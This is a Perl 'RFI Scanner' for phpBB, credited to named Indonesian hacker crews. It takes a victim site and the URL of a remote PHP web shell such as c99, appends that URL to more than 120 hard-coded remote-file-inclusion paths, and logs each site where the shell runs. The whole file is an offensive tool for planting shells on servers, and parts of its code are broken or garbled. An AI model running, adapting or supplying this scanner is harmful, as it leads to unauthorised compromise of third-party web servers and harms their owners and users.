#!/usr/bin/perl ############################################################ #RFI Scanner Perl PHPbb - v27.9 # #Coded by jos_ali_joe RFI Scanner Perl # #Indonesian Docer Team # #Contact: josalijoe@yahoo.com # #Explore Crew - Indonesian Coder - Devilz COde - IH - HN # #ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael # ############################################################ use HTTP::Request; use LWP::UserAgent; sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title RFI Scanner Perl PHPbb - v27.9 "); system ("color 02"); } } &lw; print "\t\t########################################################\n\n"; print "\t\t## RFI Scanner PHPbb v27.9 IDC ##\n\n"; print "\t\t## by jos_ali_joe ##\n\n"; print "\t\t## special thanks : gunslinger_ Mywisdom ##\n\n"; print "\t\t########################################################\n\n"; print "Insert host:(ex: http://www.maho.com/)\n"; $host=; chomp $host; print "\n"; # If the url doesn't have http: at the beginning if ( $host !~ /^http:/ ) { # we add it $host = 'http://' . $host; } # If the url doesn't have / at the end if ( $host !~ //$/ ) { # we add it $host = $host . '/'; } print "Insert shell:(ex: http://www.maho.com/c99.txt)\n"; $shell=; chomp $shell; print "\n"; # If the url doesn't have http: at the beginning if ( $shell !~ /^http:/ ) { # we add it $shell = 'http://' . $shell; } print "Insert string search:(ex: c99shell)\n"; $string=; chomp $string; print "\n\n"; print "Your config:\n\n"; print " Victim: $host \n"; print " Url Shell: $shell \n"; print " Search String: $string \n\n"; print "Scan...\n\n"; $vuln1="/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]="; $vuln2="/includes/functions_portal.php?phpbb_root_path="; $vuln3="/includes/functions_mod_user.php?phpbb_root_path="; $vuln4="/includes/openid/Auth/OpenID/BBStore.php?openid_root_path="; $vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path="; $vuln6="/language/lang_german/lang_main_album.php?phpbb_root_path="; $vuln7="/link_main.php?phpbb_root_path="; $vuln8="/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH="; $vuln9="MOD_forum_fields_parse.php?phpbb_root_path="; $vuln10="/codebb/pass_code.php?phpbb_root_path="; $vuln11="/codebb/lang_select?phpbb_root_path="; $vuln12="/includes/functions_nomoketos_rules.php?phpbb_root_path="; $vuln13="/includes/functions.php?phpbb_root_path="; $vuln14="/admin/admin_forum_prune.php?phpbb_root_path="; $vuln15="/ezconvert/config.php?ezconvert_dir="; $vuln16="/includes/class_template.php?phpbb_root_path="; $vuln17="/includes/usercp_viewprofile.php?phpbb_root_path="; $vuln18="/includes/functions.php?phpbb_root_path="; $vuln19="/menu.php?sesion_idioma="; $vuln20="/includes/functions.php?phpbb_root_path="; $vuln21="/admin/admin_linkdb.php?phpbb_root_path="; $vuln22="/admin/admin_extensions.php?phpbb_root_path="; $vuln23="/admin/admin_board.php?phpbb_root_path="; $vuln24="/admin/admin_attachments.php?phpbb_root_path="; $vuln25="/admin/admin_users.php?phpbb_root_path="; $vuln26="/includes/archive/archive_topic.php?phpbb_root_path="; $vuln28="/admin/modules_data.php?phpbb_root_path="; $vuln29="/faq.php?foing_root_path="; $vuln30="/index.php?foing_root_path="; $vuln31="/list.php?foing_root_path="; $vuln32="/login.php?foing_root_path="; $vuln33="/playlist.php?foing_root_path="; $vuln34="/song.php?foing_root_path="; $vuln35="/gen_m3u.php?foing_root_path="; $vuln36="/view_artist.php?foing_root_path="; $vuln37="/view_song.php?foing_root_path="; $vuln38="/login.php?foing_root_path="; $vuln39="/flash/set_na.php?foing_root_path="; $vuln40="/flash/initialise.php?foing_root_path="; $vuln41="/flash/get_song.php?foing_root_path="; $vuln42="/includes/common.php?foing_root_path="; $vuln43="/admin/nav.php?foing_root_path="; $vuln44="/admin/main.php?foing_root_path="; $vuln45="/admin/list_artists.php?foing_root_path="; $vuln46="/admin/index.php?foing_root_path="; $vuln47="/admin/genres.php?foing_root_path="; $vuln48="/admin/edit_artist.php?foing_root_path="; $vuln49="/admin/edit_album.php?foing_root_path="; $vuln50="/admin/config.php?foing_root_path="; $vuln51="/admin/admin_status.php?foing_root_path="; $vuln52="language/lang_english/lang_prillian_faq.php?phpbb_root_path="; $vuln53="/includes/functions_mod_user.php?phpbb_root_path="; $vuln54="/language/lang_french/lang_prillian_faq.php?phpbb_root_path="; $vuln55="/includes/archive/archive_topic.php?phpbb_root_path="; $vuln56="/functions_rpg_events.php?phpbb_root_path="; $vuln57="/admin/admin_spam.php?phpbb_root_path="; $vuln58="/includes/functions_newshr.php?phpbb_root_path="; $vuln59="/zufallscodepart.php?phpbb_root_path="; $vuln60="/mods/iai/includes/constants.php?phpbb_root_path="; $vuln61="/root/includes/antispam.php?phpbb_root_path="; $vuln62="/phpBB2/shoutbox.php?phpbb_root_path="; $vuln63="/includes/functions_mod_user.php?phpbb_root_path="; $vuln64="/includes/functions_mod_user.php?phpbb_root_path="; $vuln65="/includes/journals_delete.php?phpbb_root_path="; $vuln66="/includes/journals_post.php?phpbb_root_path="; $vuln67="/includes/journals_edit.php?phpbb_root_path="; $vuln68="/includes/functions_num_image.php?phpbb_root_path="; $vuln69="/includes/functions_user_viewed_posts.php?phpbb_root_path="; $vuln70="/includes/themen_portal_mitte.php?phpbb_root_path="; $vuln71="/includes/logger_engine.php?phpbb_root_path="; $vuln72="/includes/logger_engine.php?phpbb_root_path="; $vuln73="/includes/functions_static_topics.php?phpbb_root_path="; $vuln74="/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path="; $vuln75="/includes/functions_kb.php?phpbb_root_path="; $vuln76="/includes/bbcb_mg.php?phpbb_root_path="; $vuln77="/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path="; $vuln78="/includes/pafiledb_constants.php?module_root_path="; $vuln79="/index.php?phpbb_root_path="; $vuln80="/song.php?phpbb_root_path="; $vuln81="/faq.php?phpbb_root_path="; $vuln82="/list.php?phpbb_root_path="; $vuln83="/gen_m3u.php?phpbb_root_path="; $vuln84="/playlist.php?phpbb_root_path="; $vuln85="/language/lang_english/lang_activity.php?phpbb_root_path="; $vuln86="/language/lang_english/lang_activity.php?phpbb_root_path="; $vuln87="/blend_data/blend_common.php?phpbb_root_path="; $vuln88="/blend_data/blend_common.php?phpbb_root_path="; $vuln89="/modules/Forums/admin/index.php?phpbb_root_path="; $vuln90="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path="; $vuln91="/modules/Forums/admin/admin_board.php?phpbb_root_path="; $vuln92="/modules/Forums/admin/admin_disallow.php?phpbb_root_path="; $vuln93="/modules/Forums/admin/admin_forumauth.php?phpbb_root_path="; $vuln94="/modules/Forums/admin/admin_groups.php?phpbb_root_path="; $vuln95="/modules/Forums/admin/admin_ranks.php?phpbb_root_path="; $vuln96="/modules/Forums/admin/admin_styles.php?phpbb_root_path="; $vuln97="/modules/Forums/admin/admin_user_ban.php?phpbb_root_path="; $vuln98="/modules/Forums/admin/admin_words.php?phpbb_root_path="; $vuln99="/modules/Forums/admin/admin_avatar.php?phpbb_root_path="; $vuln100="/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path="; $vuln101="/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path="; $vuln102="/modules/Forums/admin/admin_forums.php?phpbb_root_path="; $vuln103="/modules/Forums/admin/admin_mass_email.php?phpbb_root_path="; $vuln104="/modules/Forums/admin/admin_smilies.php?phpbb_root_path="; $vuln105="$vuln58="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path="; $vuln106="/modules/Forums/admin/admin_users.php?phpbb_root_path="; $vuln107="/stat_modules/users_age/module.php?phpbb_root_path="; $vuln108="/includes/functions_cms.php?phpbb_root_path="; $vuln109="/m2f/m2f_phpbb204.php?m2f_root_path="; $vuln110="/m2f/m2f_forum.php?m2f_root_path="; $vuln111="/m2f/m2f_mailinglist.php?m2f_root_path="; $vuln112="/m2f/m2f_cron.php?m2f_root_path="; $vuln113="/lib/phpbb.php?subdir="; $vuln114="/includes/functions_mod_user.php?phpbb_root_path="; $vuln115="/includes/functions.php?phpbb_root_path="; $vuln116="/includes/functions_portal.php?phpbb_root_path="; $vuln117="/includes/functions.php?phpbb_root_path="; $vuln118="/includes/functions_admin.php?phpbb_root_path="; $vuln119="/toplist.php?f=toplist_top10&phpbb_root_path="; $vuln120="/admin/addentry.php?phpbb_root_path="; $vuln121="/includes/kb_constants.php?module_root_path="; $vuln122="/auth/auth.php?phpbb_root_path="; $vuln123="/auth/auth_phpbb/phpbb_root_path="; $vuln124="/auction/auction_common.php?phpbb_root_path="; $vuln125="/auth/auth_SMF/smf_root_path="; $vuln126="/auth/auth.php?smf_root_path="; for ($i=1;$i<59;$i++) { $cont=vuln.$i; chomp $cont; print "$cont\n"; $final=$host.$$cont."$shell?"; my $req=HTTP::Request->new(GET=>$final alias selesai); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if ($response->is_success) { if( $response->content =~ /$string/){ open(FILE,">>results.txt"); print FILE "$final\n"; close(FILE); print "-------------------------------------------------\n"; print "$final\n"; print "IS VULNZ..\n"; print "-------------------------------------------------\n"; }} }